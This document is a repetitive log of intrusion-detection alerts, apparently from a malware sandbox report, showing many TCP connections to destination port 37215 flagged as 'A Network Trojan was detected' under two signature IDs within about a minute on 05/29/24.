                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.281703
                SID:2835222
                Source Port:38322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165770
                SID:2835222
                Source Port:59548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.980265
                SID:2829579
                Source Port:58058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212028
                SID:2829579
                Source Port:38888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.721755
                SID:2829579
                Source Port:48436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.664566
                SID:2829579
                Source Port:43412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521084
                SID:2829579
                Source Port:44244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221542
                SID:2835222
                Source Port:49924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571893
                SID:2829579
                Source Port:52316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782460
                SID:2835222
                Source Port:54312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263660
                SID:2829579
                Source Port:34992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.335922
                SID:2835222
                Source Port:35638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714282
                SID:2829579
                Source Port:57424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.878690
                SID:2829579
                Source Port:44642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.110633
                SID:2829579
                Source Port:38870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022498
                SID:2829579
                Source Port:59982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.506327
                SID:2829579
                Source Port:43698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.220542
                SID:2835222
                Source Port:41816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685169
                SID:2835222
                Source Port:55772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464822
                SID:2835222
                Source Port:57084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.981781
                SID:2835222
                Source Port:42780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.703879
                SID:2835222
                Source Port:58814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111057
                SID:2829579
                Source Port:46570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508203
                SID:2835222
                Source Port:33636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364772
                SID:2829579
                Source Port:56696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.929460
                SID:2829579
                Source Port:41990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896802
                SID:2829579
                Source Port:46606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560056
                SID:2829579
                Source Port:39502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.507004
                SID:2829579
                Source Port:46928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179132
                SID:2829579
                Source Port:54786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883737
                SID:2835222
                Source Port:41876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.951094
                SID:2835222
                Source Port:51542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667715
                SID:2829579
                Source Port:38786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.979469
                SID:2835222
                Source Port:51552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781096
                SID:2835222
                Source Port:50586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.226808
                SID:2829579
                Source Port:42510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.853193
                SID:2829579
                Source Port:54192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.282009
                SID:2835222
                Source Port:52026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948195
                SID:2835222
                Source Port:59244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859750
                SID:2835222
                Source Port:58486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.446367
                SID:2829579
                Source Port:52104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.963170
                SID:2835222
                Source Port:59450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653078
                SID:2835222
                Source Port:50368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.965765
                SID:2829579
                Source Port:45288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226735
                SID:2829579
                Source Port:59406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.722254
                SID:2829579
                Source Port:58498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422304
                SID:2835222
                Source Port:53388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465356
                SID:2829579
                Source Port:59266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.945623
                SID:2829579
                Source Port:34412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163835
                SID:2835222
                Source Port:36684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166988
                SID:2829579
                Source Port:37660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466178
                SID:2835222
                Source Port:48694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.816839
                SID:2835222
                Source Port:32822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.160939
                SID:2829579
                Source Port:51758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617725
                SID:2835222
                Source Port:51642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.028838
                SID:2829579
                Source Port:47698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512111
                SID:2835222
                Source Port:56130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928461
                SID:2829579
                Source Port:60306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.326133
                SID:2835222
                Source Port:58258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573939
                SID:2835222
                Source Port:50582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.867935
                SID:2829579
                Source Port:57690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614795
                SID:2829579
                Source Port:50378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763106
                SID:2829579
                Source Port:37960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111208
                SID:2829579
                Source Port:37324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154267
                SID:2829579
                Source Port:39908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983948
                SID:2835222
                Source Port:55026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.979577
                SID:2835222
                Source Port:50104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887863
                SID:2835222
                Source Port:44118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.427462
                SID:2829579
                Source Port:46890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843585
                SID:2829579
                Source Port:56368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.235434
                SID:2829579
                Source Port:46004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.262470
                SID:2829579
                Source Port:39732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.337204
                SID:2835222
                Source Port:36022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.386532
                SID:2829579
                Source Port:47048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962326
                SID:2829579
                Source Port:54860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.986966
                SID:2835222
                Source Port:52492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.980766
                SID:2835222
                Source Port:33814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779544
                SID:2835222
                Source Port:35592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982070
                SID:2829579
                Source Port:40024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.831292
                SID:2835222
                Source Port:43130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209665
                SID:2829579
                Source Port:45714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025706
                SID:2835222
                Source Port:55692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782534
                SID:2829579
                Source Port:55900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009864
                SID:2835222
                Source Port:55852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659722
                SID:2835222
                Source Port:45860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519100
                SID:2829579
                Source Port:34410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665865
                SID:2835222
                Source Port:46350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.716316
                SID:2835222
                Source Port:32902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.712960
                SID:2835222
                Source Port:53602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843323
                SID:2829579
                Source Port:58960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.190004
                SID:2835222
                Source Port:42988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163582
                SID:2835222
                Source Port:54838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613217
                SID:2835222
                Source Port:60926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417226
                SID:2835222
                Source Port:59250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.797981
                SID:2835222
                Source Port:39396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784649
                SID:2829579
                Source Port:58962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665286
                SID:2829579
                Source Port:56726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763398
                SID:2829579
                Source Port:45604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.501327
                SID:2835222
                Source Port:59052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.711375
                SID:2835222
                Source Port:39536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958826
                SID:2829579
                Source Port:40012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.236140
                SID:2829579
                Source Port:33456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.934974
                SID:2829579
                Source Port:45110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136780
                SID:2835222
                Source Port:44106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813484
                SID:2835222
                Source Port:37554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.795263
                SID:2829579
                Source Port:36066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.074741
                SID:2829579
                Source Port:34902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.570705
                SID:2835222
                Source Port:49322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941185
                SID:2835222
                Source Port:54796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032349
                SID:2829579
                Source Port:56350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.556979
                SID:2829579
                Source Port:48540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.070361
                SID:2829579
                Source Port:39696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659687
                SID:2835222
                Source Port:48946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763695
                SID:2835222
                Source Port:55748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.180301
                SID:2829579
                Source Port:42256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.441060
                SID:2835222
                Source Port:41190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.616359
                SID:2829579
                Source Port:49602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.651858
                SID:2835222
                Source Port:45808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.871775
                SID:2835222
                Source Port:39392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712677
                SID:2835222
                Source Port:47204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583184
                SID:2835222
                Source Port:50710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.275979
                SID:2829579
                Source Port:37892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.802671
                SID:2835222
                Source Port:49684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.091694
                SID:2829579
                Source Port:49548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024361
                SID:2835222
                Source Port:59376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.524393
                SID:2829579
                Source Port:48316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614091
                SID:2829579
                Source Port:57064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.593392
                SID:2835222
                Source Port:50874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.809258
                SID:2835222
                Source Port:33114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.816317
                SID:2835222
                Source Port:57488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381118
                SID:2835222
                Source Port:35230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421047
                SID:2829579
                Source Port:58440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660275
                SID:2835222
                Source Port:36650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.498175
                SID:2835222
                Source Port:46918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873189
                SID:2829579
                Source Port:35884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897216
                SID:2829579
                Source Port:60254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773213
                SID:2835222
                Source Port:49330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586585
                SID:2835222
                Source Port:50686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.973157
                SID:2835222
                Source Port:36774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.650128
                SID:2829579
                Source Port:56082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902940
                SID:2829579
                Source Port:60254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791587
                SID:2829579
                Source Port:54060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779377
                SID:2835222
                Source Port:39326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653543
                SID:2835222
                Source Port:41616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.598002
                SID:2835222
                Source Port:55466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022413
                SID:2835222
                Source Port:44650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652586
                SID:2835222
                Source Port:53132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763084
                SID:2829579
                Source Port:47156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008789
                SID:2835222
                Source Port:43518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.801195
                SID:2835222
                Source Port:60848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224368
                SID:2835222
                Source Port:54242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.319091
                SID:2829579
                Source Port:51532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813408
                SID:2835222
                Source Port:33866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521240
                SID:2829579
                Source Port:47248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.738320
                SID:2835222
                Source Port:42920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.969734
                SID:2829579
                Source Port:41640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862789
                SID:2829579
                Source Port:43312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.095668
                SID:2829579
                Source Port:43454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893191
                SID:2835222
                Source Port:46476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419484
                SID:2835222
                Source Port:44386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899552
                SID:2829579
                Source Port:51356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227447
                SID:2829579
                Source Port:50294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666392
                SID:2829579
                Source Port:42308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071497
                SID:2835222
                Source Port:53652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.133650
                SID:2835222
                Source Port:57954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.139829
                SID:2835222
                Source Port:38282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.596716
                SID:2835222
                Source Port:60344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.713161
                SID:2835222
                Source Port:35552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.860396
                SID:2835222
                Source Port:50314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.317819
                SID:2829579
                Source Port:37002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.645651
                SID:2829579
                Source Port:50518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573151
                SID:2835222
                Source Port:60158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667690
                SID:2835222
                Source Port:39456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.222889
                SID:2835222
                Source Port:51694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225210
                SID:2829579
                Source Port:49416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663495
                SID:2829579
                Source Port:40546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893933
                SID:2829579
                Source Port:47226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969893
                SID:2829579
                Source Port:35490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824706
                SID:2835222
                Source Port:58980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.041342
                SID:2829579
                Source Port:52514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675264
                SID:2835222
                Source Port:60896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897012
                SID:2829579
                Source Port:55404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787289
                SID:2835222
                Source Port:47608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328370
                SID:2829579
                Source Port:38284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.576502
                SID:2835222
                Source Port:48564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.037842
                SID:2835222
                Source Port:34314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.441172
                SID:2835222
                Source Port:40188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179966
                SID:2835222
                Source Port:33616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160994
                SID:2829579
                Source Port:48812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.562787
                SID:2835222
                Source Port:55390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.269613
                SID:2835222
                Source Port:37998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417014
                SID:2835222
                Source Port:37744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.584845
                SID:2829579
                Source Port:52188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.963907
                SID:2835222
                Source Port:33090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.507536
                SID:2829579
                Source Port:58958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583110
                SID:2835222
                Source Port:33696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263951
                SID:2835222
                Source Port:56498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
